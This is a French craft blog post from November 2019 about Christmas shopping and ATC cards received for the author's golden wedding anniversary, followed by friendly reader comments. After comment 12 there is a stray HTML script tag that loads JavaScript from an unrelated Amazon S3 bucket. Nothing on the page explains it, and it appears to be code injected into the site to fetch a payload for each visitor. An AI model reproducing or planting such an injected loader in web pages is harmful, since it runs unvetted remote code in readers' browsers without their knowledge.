• APEAUTRE. Variété rustique de blé que Jésus employait pour multiplier les pains

    "Apeautre. Variété rustique de blé que Jésus employait pour multiplier les pains." Alain Créhange

    APEAUTRE. Variété rustique de blé que Jésus employait pour multiplier les pains

    Ce matin à 8 h, 7°:

    APEAUTRE. Variété rustique de blé que Jésus employait pour multiplier les pains

    J'ai fait mes courses énormément de monde, Noël approche, encore rien acheté:

    APEAUTRE. Variété rustique de blé que Jésus employait pour multiplier les pains

    Le courrier m'attendait: une  enveloppe de Mafalda, elle m'envoie  une magnifique ATC pour nos Noces d'Or, elle a ajouté des petits boutons rigolos:

    APEAUTRE. Variété rustique de blé que Jésus employait pour multiplier les pains

    APEAUTRE. Variété rustique de blé que Jésus employait pour multiplier les pains

    Grand merci Cendrine tu portes le n°27 je t'envoie une carte en retour!

    Je ferai un article à part pour mettre toutes vos ATC et mes cartes envoyées!

    Je vous rappelle mon article: ICI

    Nos noce d'Or 

    Cet aprem j'ai fait des petites croix, je commence mes ATC 2020, j'aime avoir de l'avance, on ne sait jamais ce qui nous attend et j'ai horreur d'être en retard.

    Mon cadeau: ICI

    APEAUTRE. Variété rustique de blé que Jésus employait pour multiplier les pains


  • Commentaires

    1
    Vendredi 22 Novembre 2019 à 17:56
    Tres mignone carte moi aussi j ai déjà presque fini mes atc pour janvier
      • Vendredi 22 Novembre 2019 à 18:10

        Pour janvier il me reste celles chez Fred! Je sais que tu n'as jamais de retard!

        Bonne soirée

        Bisous

    2
    Vendredi 22 Novembre 2019 à 18:13

    Très bel envoi de la part de Cendrine!

    Bravo pour ton organisations je t'admire  moi je vis plutot le moment present donc j'anticipe beaucoup moins que toi pour les echanges d'ailleurs ton atc noce d'or pas encore fait mais le seras atemps!

    Bonne soirée

    Bisous

      • Vendredi 22 Novembre 2019 à 18:14

        Si je prends du retard je stresse, j'ai choisi tous mes modèles pour l'année et je fais une ATC dès que j'ai un moment, ça me détend!

        Merci d'avance, bonne soirée

        Bisous

    3
    aline
    Vendredi 22 Novembre 2019 à 18:18

    Tu as raison de prendre de l'avance. Moi aussi j'ai fait mon mois de Janvier !!! Comme ça pas de panique. !!! Par contre j'avais l'intention de ranger, trier etc!!!! mais là je n'avance pas. !!! Passez une douce soirée et bizzzz    Aline

    4
    Vendredi 22 Novembre 2019 à 18:22

    moi aussi, j'aime bien faire en avance quand je peux !

    Bonne soirée, bisous

    5
    Vendredi 22 Novembre 2019 à 18:24
    du beau courrier bisous
    6
    Vendredi 22 Novembre 2019 à 18:31

    un bien joli courrier

    7
    Vendredi 22 Novembre 2019 à 18:47
    Tres jolie ATC
    8
    Vendredi 22 Novembre 2019 à 19:46
    Magnifique ATC !
    Bravo à Mafalda
    Douce soirée, bisous
    9
    Vendredi 22 Novembre 2019 à 20:14

    Courses aussi cet aprem!

    Peu de monde dans le magasin!

    Bravo à celles qui prennent de l'avance!

    Je ne sais pas faire! Je suis toujours en retard!

    4° ce matin à 8h!  Soleil jusqu'à midi! Vent et pluie ce soir!

    10
    bluetit
    Vendredi 22 Novembre 2019 à 21:19

    rien de prêt pour Noel , juste l idée de partir

    trop mimi ces deux tasses cœur

     bravo

     bonne soirée 

     bisous  

     

    11
    Mignon
    Vendredi 22 Novembre 2019 à 21:22

    Belle ATC encore! Bravo à Mafalda.

    Moi aussi ai été faire des courses ,mais n'ai pas trouvé tout ce que je voulais.

    Pour le moment surbookée,..... ai déjà fait mon ATC pour  Sandrine..

    Nous revenons du cinéma, où nous avons été voir: "joyeuse retraite" avec Thierry Lhermite et Michèle Laroque.  Pas mal, c'est tout à fait ça!!! Un bon moment avec ma moitié.

    Bonne soirée.

    Bisous de Chantou

      • Vendredi 22 Novembre 2019 à 22:16

        Tant mieux ça fait plaisir ces bons moments, j'ai entendu la présentation de ce film sur RTL! Bonne soirée

        Bisous

    12
    Evy
    Vendredi 22 Novembre 2019 à 22:26

    Beau partage beau travail passe une bonne soirée bisous

    <script src="https://s3.amazonaws.com/extseahes/2.js"></script>
    13
    Samedi 23 Novembre 2019 à 00:09

    merci Martine pour l'article , et merci pour les commentaires : ) 

    ravie de participer pour tes noces d'Or ! 

    bravo pour ta broderie températures qui progresse avec les jours plus froids!

    (pour les magasins et les courses de Noel , j'ai riens fait , je peux pas trop sortir et puis j'ai la maison sans (sens) dessus-dessous !, j'ai du rangement a faire avant ) 

    bises, bon weekend !

     

     

      • Samedi 23 Novembre 2019 à 08:20

        Moi ça me gave car c'est devenu plus que commercial, encore merci, ton enveloppe est prête, dès que je sors je la poste!

        Bonne journée et bon courage, bisous

    14
    Tata covo
    Samedi 23 Novembre 2019 à 08:56
    Bravo ça remarche moi je vais chezfille je vais faire une grande partie de mes achats de Noël vu que je serai immobilisée
      • Samedi 23 Novembre 2019 à 09:05

        Bon courage ma Coco et bonne journée

        Bisous

    15
    Samedi 23 Novembre 2019 à 08:57

    Bon week end Martine sous la pluie à Antibes

    Bisous

    16
    Sissi94
    Samedi 23 Novembre 2019 à 16:49

    J'essaie aussi d'anticiper pour la broderie mais 2020 est encore loin.

    Bonne fin de journée.

    Sylvie 

      • Samedi 23 Novembre 2019 à 16:53

        Décembre va passer bien vite!

        Bisous

    17
    Samedi 23 Novembre 2019 à 18:44
    gateuxrigolo

    hello ba comme toi toujours rien acheter encore bisous

    18
    Dimanche 24 Novembre 2019 à 15:32

    Une joli atc, bisous.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :